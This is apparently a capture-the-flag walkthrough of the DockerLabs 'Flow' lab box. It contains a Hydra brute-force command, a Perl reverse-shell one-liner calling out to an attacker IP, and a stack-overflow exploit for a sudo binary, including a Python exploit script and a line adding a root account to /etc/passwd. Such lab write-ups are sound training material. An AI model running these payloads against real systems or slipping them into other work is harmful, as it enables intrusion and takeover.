DockerLabs-Flow-Walkthrough
城南花已开

Information Gathering

Service Detection

export ip=172.17.0.2
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 172.17.0.2:22
Open 172.17.0.2:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 19:03 CST
Initiating ARP Ping Scan at 19:03
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 19:03, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:03
Completed Parallel DNS resolution of 1 host. at 19:03, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:03
Scanning 172.17.0.2 [2 ports]
Discovered open port 80/tcp on 172.17.0.2
Discovered open port 22/tcp on 172.17.0.2
Completed SYN Stealth Scan at 19:03, 0.05s elapsed (2 total ports)
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.000076s latency).
Scanned at 2025-06-15 19:03:29 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 02:42:AC:11:00:02 (Unknown)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Directory Enumeration

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 2615]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

Only index.php turns up.

Open it in a browser.

It's a login form.

Brute-forcing with Hydra

Viewing the page source reveals an HTML comment containing d1se0.

That is probably a username.

Brute-forcing the form with that username yields the password amigos.

❯ hydra -l d1se0  -P /usr/share/wordlists/rockyou.txt $ip  http-post-form "/index.php:username=d1se0&password=^PASS^:S=302" -t 64 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-15 21:50:44
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-post-form://172.17.0.2:80/index.php:username=d1se0&password=^PASS^:S=302
[80][http-post-form] host: 172.17.0.2 login: d1se0 password: amigos
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-15 21:50:51

After logging in you are redirected to /gestionAdminPanel.php, which is what the S=302 success condition in the Hydra command keys on: a successful login answers with a redirect, a failed one re-renders the form.

There is nothing to interact with, though; it is just a welcome page.

Command Execution

Intercept the request and look at it.

The User-Agent header ends up in a system command, so controlling it gives arbitrary command execution.

Time to get a reverse shell.

nc isn't on the box, so use perl instead.

perl -e 'use Socket;$i="192.168.60.100";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

User Privilege Escalation

Start the listener.

Once the shell comes back, /etc/passwd shows a user named flow.

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100 • 172.17.0.1
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from 740fe5d8063f-172.17.0.2-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/2025_06_15-22_05_14-241.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@740fe5d8063f:/var/www/html$ cat /etc/passwd |grep bin/bash
root:x:0:0:root:/root:/bin/bash
flow:x:1001:1001:flow,,,:/home/flow:/bin/bash
  • The code snippet responsible for the command execution (a screenshot in the original post)

Look for files owned by flow.

www-data@740fe5d8063f:/tmp/toolkit-HqUVDeDb$ find / -user flow 2>/dev/null
/usr/bin/secret
/home/flow
www-data@740fe5d8063f:/tmp/toolkit-HqUVDeDb$ file /usr/bin/secret
bash: file: command not found
www-data@740fe5d8063f:/tmp/toolkit-HqUVDeDb$ cat /usr/bin/secret
#!/bin/bash

# MQYXGZJQNFZXI2DFMJSXG5CAEQSCC===

whoami

This looks like a base-family encoding, though it isn't obvious at first glance which one. The alphabet narrows it down: uppercase A-Z plus digits 2-7 with "=" padding is the Base32 (RFC 4648) set.

Throw it at CyberChef.
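Identifying the encoding offline, as an added example that is not part of the original post: each base-family decoder is tried in turn, with a cheap alphabet pre-check and a printable-output filter, which is essentially what CyberChef's automatic detection does. The sample string is the one pulled from /usr/bin/secret.

```python
#!/usr/bin/env python3
"""Identify a base-family encoding by trying each decoder.

Added example, not from the original post. Decode with every candidate and
keep the ones whose output is printable; the alphabet check rejects most
candidates before the decoder even runs.
"""
import base64
import binascii
import re
import string

# The comment pulled from /usr/bin/secret on the target.
SAMPLE = "MQYXGZJQNFZXI2DFMJSXG5CAEQSCC==="

# name -> (alphabet regex, decoder)
CANDIDATES = {
    "base16": (re.compile(r"^[0-9A-Fa-f]+$"), base64.b16decode),
    "base32": (re.compile(r"^[A-Z2-7]+=*$"), base64.b32decode),
    "base64": (re.compile(r"^[A-Za-z0-9+/]+=*$"), base64.b64decode),
    "base64url": (re.compile(r"^[A-Za-z0-9_-]+=*$"), base64.urlsafe_b64decode),
    "base85": (re.compile(r"^[!-u]+$"), base64.b85decode),
}

# Printable ASCII plus the usual whitespace; vertical tab / form feed excluded.
PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")


def is_printable(data: bytes) -> bool:
    return len(data) > 0 and all(b in PRINTABLE for b in data)


def decode_candidates(text: str) -> dict:
    """Return {encoding: decoded bytes} for every decoder that yields printable output."""
    text = text.strip()
    found = {}
    for name, (alphabet, decoder) in CANDIDATES.items():
        if not alphabet.match(text):
            continue
        try:
            out = decoder(text)
        except (binascii.Error, ValueError):
            continue  # wrong length / padding for this encoding
        if is_printable(out):
            found[name] = out
    return found


if __name__ == "__main__":
    for name, out in decode_candidates(SAMPLE).items():
        print(f"{name:10s} -> {out!r}")
```

Base64 is rejected here not by the alphabet (the sample is valid Base64 characters) but by the decoder: 29 data characters cannot be a Base64 quantum, so the padding check fails. That is the kind of structural check worth doing before trusting a printable-looking result.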


That yields the password d1se0isthebest@$$!; switch to that user.

www-data@740fe5d8063f:/tmp/toolkit-HqUVDeDb$ su flow
Password:
flow@740fe5d8063f:/tmp/toolkit-HqUVDeDb$ cd ~
flow@740fe5d8063f:~$ ls -al
total 28
drwxr-x--- 3 flow flow 4096 Dec 22 17:06 .
drwxr-xr-x 1 root root 4096 Dec 22 16:28 ..
-rw-r--r-- 1 flow flow 220 Dec 22 16:27 .bash_logout
-rw-r--r-- 1 flow flow 3771 Dec 22 16:27 .bashrc
drwx------ 2 flow flow 4096 Dec 22 17:05 .cache
-rw-r--r-- 1 flow flow 807 Dec 22 16:27 .profile
-rw-r--r-- 1 root root 33 Dec 22 17:01 user.txt
flow@740fe5d8063f:~$ cat user.txt
8faa61e648fe0368af3336cf7f975410

Privilege Escalation to Root

The user also has a sudo entry:

flow can run /usr/local/bin/manager as root without a password. It is almost certainly a custom program written by the box author.

flow@740fe5d8063f:~$ sudo -l
Matching Defaults entries for flow on 740fe5d8063f:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User flow may run the following commands on 740fe5d8063f:
(ALL : ALL) NOPASSWD: /usr/local/bin/manager
flow@740fe5d8063f:~$ ls -al /usr/local/bin/manager
-rwxr-xr-x 1 root root 16600 Dec 22 21:46 /usr/local/bin/manager
flow@740fe5d8063f:~$ sudo /usr/local/bin/manager
############################################################
# Sistema de Gestión - Modo Usuario/Admin #
############################################################

Escribe la contraseña: aaaaa

[+] Estás en modo usuario
Tu clave sera "root" para entrar al modo administrador
flow@740fe5d8063f:~$ sudo /usr/local/bin/manager
############################################################
# Sistema de Gestión - Modo Usuario/Admin #
############################################################

Escribe la contraseña: root

[+] Estás en modo usuario
Tu clave sera "root" para entrar al modo administrador

Stack Overflow

Download it locally and decompile it.

flow@740fe5d8063f:~$
[!] Session detached ⇲

(Penelope)─(Session [1])> download /usr/local/bin/manager
[+] Download OK '/home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/downloads/usr/local/bin/manager'

Program logic from the decompilation (a screenshot in the original post):

A textbook stack overflow.

Input is read with fgets, but with a size larger than the destination buffer, so a long password still overruns it. The cyclic pattern in the gdb session below is cut off after 127 characters, consistent with an fgets size of 128, while the key variable sits only 76 bytes past the start of the buffer.

  • If v5 equals 1919905652 (a specific magic number):
    • print the green "[+] Est..." message, meaning admin mode was entered;
    • call write_key_to_file(v5) to write the value of v5 to a file;
    • call execute_command(), which lets the user run system commands.
  • If v5 is anything else (including its initial value 1234):
    • print the red "[!] Est..." message, meaning admin mode was not entered;
    • call write_key_to_file(v5) to write the value of v5 to a file;
    • call user_mode().

Check the binary's protections.

PIE is enabled, so the base address is randomized and function addresses change on every load. There is no stack canary, though, so the overflow itself goes undetected; and since the target turns out to be a local variable rather than a return address, PIE ends up not mattering.

❯ checksec manager
[*] '/home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/downloads/usr/local/bin/manager'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: PIE enabled
Stack: Executable
RWX: Has RWX segments
Stripped: No

So, the usual first step: find the offset.

The saved RIP is overwritten at offset 88.

❯ gdb -q manager
pwndbg: loaded 188 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from manager...
(No debugging symbols found in manager)
------- tip of the day (disable with set show-tips off) -------
Use GDB's pi command to run an interactive Python console where you can use Pwndbg APIs like pwndbg.aglib.memory.read(addr, len), pwndbg.aglib.memory.write(addr, data), pwndbg.aglib.vmmap.get() and so on!
pwndbg> cyclic 300
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa
pwndbg> r
Starting program: /home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/downloads/usr/local/bin/manager
warning: opening /proc/self/mem file failed: Permission denied (13)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
############################################################
# Sistema de Gestión - Modo Usuario/Admin #
############################################################

Escribe la contraseña: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa

[+] Estás en modo usuario
Tu clave sera "root" para entrar al modo administrador

Program received signal SIGSEGV, Segmentation fault.
0x00005555555553b8 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────
RAX 0
RBX 0x7fffffffde68 —▸ 0x7fffffffe16e ◂— '/home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/downloads/usr/local/bin/manager'
RCX 0x555555559c90 —▸ 0x7ffff7f951c8 (_IO_wfile_jumps) ◂— 0
RDX 0
RDI 0x7ffff7f987b0 (_IO_stdfile_1_lock) ◂— 0
RSI 0x5555555592a0 ◂— 0x632075546d305b1b
R8 0
R9 0
R10 0
R11 0x202
R12 0
R13 0x7fffffffde78 —▸ 0x7fffffffe1cb ◂— 'DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus'
R14 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe310 —▸ 0x555555554000 ◂— 0x10102464c457f
R15 0x555555557dd8 (__do_global_dtors_aux_fini_array_entry) —▸ 0x555555555190 (__do_global_dtors_aux) ◂— endbr64
RBP 0x616161616161616b ('kaaaaaaa')
RSP 0x7fffffffdd58 ◂— 'laaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaa'
RIP 0x5555555553b8 (main+253) ◂— ret
─────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────
► 0x5555555553b8 <main+253> ret <0x616161616161616c>
──────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdd58 ◂— 'laaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaa'
01:0008│ 0x7fffffffdd60 ◂— 'maaaaaaanaaaaaaaoaaaaaaapaaaaaa'
02:0010│ 0x7fffffffdd68 ◂— 'naaaaaaaoaaaaaaapaaaaaa'
03:0018│ 0x7fffffffdd70 ◂— 'oaaaaaaapaaaaaa'
04:0020│ 0x7fffffffdd78 ◂— 0x61616161616170 /* 'paaaaaa' */
05:0028│ 0x7fffffffdd80 —▸ 0x7fffffffde68 —▸ 0x7fffffffe16e ◂— '/home/Pepster/.penelope/740fe5d8063f~172.17.0.2_Linux_x86_64/downloads/usr/local/bin/manager'
06:0030│ 0x7fffffffdd88 ◂— 0x655c32971ce65e88
07:0038│ 0x7fffffffdd90 ◂— 0
────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────
► 0 0x5555555553b8 main+253
1 0x616161616161616c None
2 0x616161616161616d None
3 0x616161616161616e None
4 0x616161616161616f None
5 0x61616161616170 None
6 0x7fffffffde68 None
7 0x655c32971ce65e88 None
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x616161616161616c
Finding cyclic pattern of 8 bytes: b'laaaaaaa' (hex: 0x6c61616161616161)
Found at offset 88
pwndbg> q

Now try the overflow on the target and see what changes.

key_output.txt now reads 1094795585 instead of the earlier 1234.

flow@740fe5d8063f:/tmp$ (python3 -c 'import sys; sys.stdout.buffer.write(b"A"*88 + b"BBBB")')|sudo /usr/local/bin/manager
############################################################
# Sistema de Gestión - Modo Usuario/Admin #
############################################################

Escribe la contraseña:
[+] Estás en modo usuario
Tu clave sera "root" para entrar al modo administrador
Segmentation fault
flow@740fe5d8063f:/tmp$ cat key_output.txt
key = 1094795585

1094795585 in hex is 0x41414141: v5 was overwritten with "AAAA" (the filler), while the "BBBB" at offset 88 landed on the saved return address, hence the segfault on return.

So there is no need to reach RIP at all; overwriting v5 (the key) is enough.

After some trial and error, an offset of 76 puts BBBB exactly on v5.

flow@740fe5d8063f:/tmp$ (python3 -c 'import sys; sys.stdout.buffer.write(b"A"*76 + b"BBBB")')|sudo /usr/local/bin/manager
############################################################
# Sistema de Gestión - Modo Usuario/Admin #
############################################################

Escribe la contraseña:
[+] Estás en modo usuario
Tu clave sera "root" para entrar al modo administrador
flow@740fe5d8063f:/tmp$ cat key_output.txt
key = 1111638594

  • 76 is the offset from the start of buf to the key variable
  • 88 is the offset from the start of buf to the saved RIP

The size of the input buffer s can also be read straight off the stack layout in IDA Pro.


By the program's logic v5 must equal 1919905652,

which is 0x726f6f74 in hex.

On little-endian x86-64 the least significant byte is stored first, so the bytes that must sit in memory are 74 6f 6f 72, i.e. the ASCII string "toor" (the magic number is simply "root" read as a big-endian integer):

❯ python3 -c "from pwn import *; print(p32(0x726f6f74))"
b'toor'

Try it.

This clearly reached execute_command(), but the command it handed to sh was garbage.

flow@740fe5d8063f:/tmp$ (python3 -c 'import sys; sys.stdout.buffer.write(b"A"*76 + b"toor")')|sudo /usr/local/bin/manager
############################################################
# Sistema de Gestión - Modo Usuario/Admin #
############################################################

Escribe la contraseña:
[+] Estás en modo administrador

[+] Modo administrador activado.
sh: 1: U: not found

But why "not found"?

Because once the writer side of a pipe (|) has written everything and exited, the read side sees EOF.

So manager's stdin is already at EOF once the password has been consumed, and its subsequent read of a command gets nothing; presumably whatever stale bytes were in the command buffer went to sh, hence "U: not found".

Instead, write the payload to a file and pipe (cat payload.bin; cat -) into manager: after the payload, cat - keeps forwarding the terminal's stdin, so the pipe stays open for the commands.

Output only appears after the second Enter. payload.bin carries no trailing newline, so the fgets reading the password keeps consuming until the first newline typed and swallows that line; the second line is what reaches the command prompt. Ending payload.bin with a newline avoids this.

flow@740fe5d8063f:/tmp$ python3 -c 'import sys; sys.stdout.buffer.write(b"A"*76 + b"toor")' > payload.bin
flow@740fe5d8063f:/tmp$ (cat payload.bin; cat -) | sudo /usr/local/bin/manager
############################################################
# Sistema de Gestión - Modo Usuario/Admin #
############################################################

id
Escribe la contraseña:
[+] Estás en modo administrador

[+] Modo administrador activado.
id
uid=0(root) gid=0(root) groups=0(root)
Escribe un comando: id
cat: write error: Broken pipe
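The payload construction and the stdin problem just discussed, as one added example that is not code from the original post. The offsets (76 to the key, 88 to the saved RIP) and the magic value 1919905652 are those established above; the subprocess plumbing, the offset_correction helper for reading key_output.txt back, and the echo_stub stand-in are this example's own additions.

```python
#!/usr/bin/env python3
"""Payload construction and stdin handling for the manager overflow.

Added example for this walkthrough, not code from the original post. The
offsets (76 from the start of the input buffer to the key variable, 88 to the
saved return address) and the magic value 1919905652 are the ones established
above. Driving the binary through subprocess with a single write, the
offset_correction helper and the echo_stub stand-in are this example's own
additions.
"""
import struct
import subprocess
import sys

KEY_OFFSET = 76          # buffer start -> key (v5 in the decompilation)
RIP_OFFSET = 88          # buffer start -> saved RIP; we deliberately stop short of it
ADMIN_KEY = 1919905652   # 0x726f6f74: the bytes of "root" read as a big-endian int


def build_payload(key_value=ADMIN_KEY, offset=KEY_OFFSET, filler=b"A"):
    """Filler up to the key, then the key as a little-endian 32-bit integer.

    0x726f6f74 packs to b"toor". Nothing is written past the key, so the
    saved return address stays intact and main() returns cleanly into the
    admin branch instead of segfaulting as the 88-byte test run did.
    """
    if offset < 0 or len(filler) != 1:
        raise ValueError("offset must be >= 0 and filler a single byte")
    return filler * offset + struct.pack("<I", key_value)


def key_as_bytes(key_value):
    """The 4 bytes that sit in memory for a value read from key_output.txt."""
    return struct.pack("<I", key_value & 0xFFFFFFFF)


def offset_correction(observed_key, marker=b"BBBB"):
    """Turn a key_output.txt value into a correction for the offset just tried.

    After sending filler*offset + marker: 0 means the marker sits exactly on
    the key, a positive n means the offset was n too small, a negative n that
    it was too large, and None that no marker byte reached the key at all.
    """
    raw = key_as_bytes(observed_key)
    hits = [i for i in range(4) if raw[i] == marker[0]]
    if not hits:
        return None
    if hits[0] == 0:              # marker began at or before the key ...
        return 4 - len(hits)      # ... so this many bytes of it fell short
    return -hits[0]               # marker began inside the key: overshoot


def run_admin_commands(argv, commands, payload=None, timeout=10):
    """Feed payload, then commands, through one pipe that stays open long enough.

    `python3 -c ... | sudo manager` closes the write end right after the
    payload, so the program's next read (the command) sees EOF. Sending the
    newline-terminated payload and all commands in one write avoids that.
    """
    payload = build_payload() if payload is None else payload
    stream = payload + b"\n" + b"".join(c.encode() + b"\n" for c in commands)
    proc = subprocess.Popen(argv, stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    try:
        out, _ = proc.communicate(stream, timeout=timeout)
    except subprocess.TimeoutExpired:   # program kept prompting after EOF
        proc.kill()
        out, _ = proc.communicate()
    return out.decode(errors="replace")


def echo_stub():
    """A stand-in 'binary' that echoes stdin, to check the plumbing offline."""
    return [sys.executable, "-c", "import sys; sys.stdout.write(sys.stdin.read())"]


if __name__ == "__main__":
    # No arguments: emit a newline-terminated payload (redirect to payload.bin).
    # Otherwise: <program argv...> -- <commands...>, e.g.
    #   manager_exploit.py sudo /usr/local/bin/manager -- id "cat /root/root.txt"
    if "--" in sys.argv:
        i = sys.argv.index("--")
        print(run_admin_commands(sys.argv[1:i], sys.argv[i + 1:] or ["id"]))
    else:
        sys.stdout.buffer.write(build_payload() + b"\n")
```

Without arguments the script writes a newline-terminated payload for the (cat payload.bin; cat -) approach, so the first typed line is no longer swallowed; with a program and a -- separator it runs known commands in one go, which is all that is needed to read root.txt or append the passwd entry.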

From there, escalate directly.

flow@740fe5d8063f:/tmp$ (cat payload.bin; cat -) | sudo /usr/local/bin/manager
############################################################
# Sistema de Gestión - Modo Usuario/Admin #
############################################################


Escribe la contraseña:
[+] Estás en modo administrador

[+] Modo administrador activado.
bash

id
uid=0(root) gid=0(root) groups=0(root)
echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash' >>/etc/passwd
exit
Escribe un comando:
cat: write error: Broken pipe
flow@740fe5d8063f:/tmp$ su primary
Password:
root@740fe5d8063f:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@740fe5d8063f:/tmp# cat /root/root.txt
c8b85b82985842d2edddb7956cfac7b8

Postscript

Ah, I found a simpler way: just type the payload directly at the prompt, then enter commands normally 😅

flow@740fe5d8063f:/tmp$ sudo /usr/local/bin/manager
############################################################
# Sistema de Gestión - Modo Usuario/Admin #
############################################################

Escribe la contraseña: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtoor

[+] Estás en modo administrador

[+] Modo administrador activado.
Escribe un comando: id
uid=0(root) gid=0(root) groups=0(root)